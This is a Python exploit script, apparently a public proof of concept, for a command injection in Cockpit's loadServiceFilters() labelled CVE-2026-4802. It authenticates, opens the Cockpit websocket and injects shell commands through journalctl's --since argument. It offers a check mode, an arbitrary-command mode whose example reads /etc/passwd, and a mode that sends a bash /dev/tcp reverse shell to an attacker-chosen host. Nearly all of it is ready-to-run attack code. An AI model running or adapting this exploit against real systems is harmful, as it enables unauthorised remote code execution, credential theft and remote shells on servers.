README.md
Rendering markdown...
#!/usr/bin/env python3 -u
from __future__ import annotations
import argparse
import asyncio
import base64
import json
import os
import socket
import sys
import urllib.request
from urllib.parse import urlparse
from websockets.asyncio.client import ClientConnection, connect
from websockets.typing import Subprotocol
os.environ["PYTHONUNBUFFERED"] = "1"
banner: str = """
_____________________________________________________________________________________
______ ___ _________ ___ ____ _____
___ / / /_/ |___/ //_/_/ |__/ _/ / Cockpit Comand injection loadServiceFilters/
__ /_/ /__ /| |__ , <__ /| | _/ / / /
_ __ /_ ___ |_ /| |_ ___ |__/ / / https://hakaisecurity.io /
/_/ /_/ /_/ |_|/_/ |_|/_/ |_|/___/ / /
________________________________________________________________________________
"""
def authenticate(base_url: str, user: str, password: str, proxy: str | None = None) -> str:
token: str = base64.b64encode(f"{user}:{password}".encode()).decode()
req: urllib.request.Request = urllib.request.Request(
f"{base_url}/cockpit/login",
headers={"Authorization": f"Basic {token}"})
if proxy:
handler = urllib.request.ProxyHandler({"http": proxy, "https": proxy})
opener = urllib.request.build_opener(handler)
resp = opener.open(req)
else:
resp = urllib.request.urlopen(req)
cookie: str = resp.headers.get("Set-Cookie", "").split(";")[0]
if not cookie:
raise RuntimeError("No session cookie returned")
return cookie
def build_injection(shell_cmd: str) -> str:
payload: str = f"$({shell_cmd})"
args: list[str] = [
"journalctl", "-q", "--no-tail", "--output=verbose",
"PAYLOAD_PLACEHOLDER", "--priority=err", "--reverse", "--"]
cmd: str = " ".join(i.replace(" ", "\\ ") for i in args)
cmd = cmd.replace("PAYLOAD_PLACEHOLDER", f"--since={payload}")
return "set -o pipefail; " + cmd + " | grep SYSLOG_IDENTIFIER= | sort -u"
def _proxy_tunnel(proxy: str, target_host: str, target_port: int) -> socket.socket:
p = urlparse(proxy)
sock = socket.create_connection((p.hostname or "127.0.0.1", p.port or 8080))
connect_req = f"CONNECT {target_host}:{target_port} HTTP/1.1\r\nHost: {target_host}:{target_port}\r\n\r\n"
sock.sendall(connect_req.encode())
resp = sock.recv(4096)
if b"200" not in resp:
raise RuntimeError(f"Proxy CONNECT failed: {resp.decode()}")
return sock
async def ws_connect(base_url: str, cookie: str, proxy: str | None = None) -> ClientConnection:
ws_url: str = base_url.replace("http", "ws", 1) + "/cockpit/socket"
headers = {"Cookie": cookie, "Origin": base_url}
protos = [Subprotocol("cockpit1")]
if proxy:
target = urlparse(base_url)
host: str = target.hostname or "localhost"
port: int = target.port or (443 if target.scheme == "https" else 80)
sock = _proxy_tunnel(proxy, host, port)
ws = await connect(ws_url, additional_headers=headers,
subprotocols=protos, sock=sock)
else:
ws = await connect(ws_url, additional_headers=headers,
subprotocols=protos)
await ws.send("\n" + json.dumps({
"command": "init", "version": 1,
"channel-seed": "poc", "host": "localhost"}))
await asyncio.wait_for(ws.recv(), timeout=10)
return ws
async def ws_spawn(ws: ClientConnection, channel: str, spawn_args: list[str],
superuser: str = "try") -> str:
await ws.send("\n" + json.dumps({
"command": "open", "channel": channel,
"payload": "stream",
"spawn": spawn_args,
"superuser": superuser}))
result: str = ""
try:
for _ in range(15):
msg = await asyncio.wait_for(ws.recv(), timeout=5)
if isinstance(msg, str) and not msg.startswith("\n"):
parts: list[str] = msg.split("\n", 1)
if len(parts) > 1 and parts[0] == channel:
result += parts[1]
except (asyncio.TimeoutError, Exception):
pass
return result
async def mode_check(base_url: str, cookie: str, proxy: str | None = None) -> None:
print("[*] CHECK verifying command injection\n")
proof: str = "/tmp/cockpit-rce-check"
cmd: str = build_injection(f"id>{proof}")
print(f" injection: --since=$(id>{proof})")
print(f" bash cmd : {cmd[:80]}...\n")
ws: ClientConnection = await ws_connect(base_url, cookie, proxy)
await ws_spawn(ws, "inject", ["/bin/bash", "-ec", cmd])
await asyncio.sleep(1)
result: str = await ws_spawn(ws, "read", ["cat", proof])
await ws.close()
if result and result.strip():
print(" [!] VULNERABLE RCE confirmed")
print(f" {result.strip()}")
else:
print(" [-] Not exploitable (proof file not created)")
sys.exit(1)
async def mode_exec(base_url: str, cookie: str, shell_cmd: str, proxy: str | None = None) -> None:
print(f"[*] EXEC {shell_cmd}\n")
outfile: str = "/tmp/.cockpit-rce-out"
cmd: str = build_injection(f"{shell_cmd}>{outfile}")
ws: ClientConnection = await ws_connect(base_url, cookie, proxy)
await ws_spawn(ws, "inject", ["/bin/bash", "-ec", cmd])
await asyncio.sleep(1)
result: str = await ws_spawn(ws, "read", ["cat", outfile])
await ws.close()
if result:
print(result.rstrip())
else:
print(" [-] No output (command may have failed)")
async def mode_reverse(base_url: str, cookie: str, lhost: str, lport: int, proxy: str | None = None) -> None:
print(f"[*] REVERSE SHELL {lhost}:{lport}\n")
revshell: str = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
cmd: str = build_injection(revshell)
print(f" [*] Start listener first: nc -lvnp {lport}")
print(" [*] Sending payload...\n")
ws: ClientConnection = await ws_connect(base_url, cookie, proxy)
try:
await ws_spawn(ws, "inject", ["/bin/bash", "-ec", cmd])
except Exception:
pass
await ws.close()
print(" [*] Payload sent")
def main() -> None:
print(banner)
p: argparse.ArgumentParser = argparse.ArgumentParser(
description="CVE-2026-4802 Cockpit RCE via loadServiceFilters() command injection",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""examples:
%(prog)s --url http://localhost:9090 --user viewer --pass viewer --mode check
%(prog)s --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"
%(prog)s --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "cat /etc/passwd"
%(prog)s --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444
"""
)
p.add_argument("--url", required=True, help="Cockpit base URL")
p.add_argument("--user", required=True, help="Cockpit username")
p.add_argument("--pass", dest="password", required=True, help="Cockpit password")
p.add_argument("--mode", choices=["check", "exec", "reverse"], default="check",
help="Exploit mode (default: check)")
p.add_argument("--cmd", default="id", help="Shell command for exec mode")
p.add_argument("--lhost", help="Listener host for reverse mode")
p.add_argument("--lport", type=int, help="Listener port for reverse mode")
p.add_argument("--proxy", help="HTTP proxy (e.g. http://127.0.0.1:8080)")
args: argparse.Namespace = p.parse_args()
base: str = args.url.rstrip("/")
print(f"[*] Target: {base}")
if args.proxy:
print(f"[*] Proxy: {args.proxy}")
print(f"[*] Auth: {args.user}:{'*' * len(args.password)}\n")
try:
cookie: str = authenticate(base, args.user, args.password, args.proxy)
print(f"[+] Authenticated ({cookie[:40]}...)\n")
except Exception as e:
print(f"[!] Auth failed: {e}")
sys.exit(1)
if args.mode == "check":
asyncio.run(mode_check(base, cookie, args.proxy))
elif args.mode == "exec":
asyncio.run(mode_exec(base, cookie, args.cmd, args.proxy))
elif args.mode == "reverse":
if not args.lhost or not args.lport:
print("[!] --lhost and --lport required for reverse mode")
sys.exit(1)
asyncio.run(mode_reverse(base, cookie, args.lhost, args.lport, args.proxy))
if __name__ == "__main__":
main()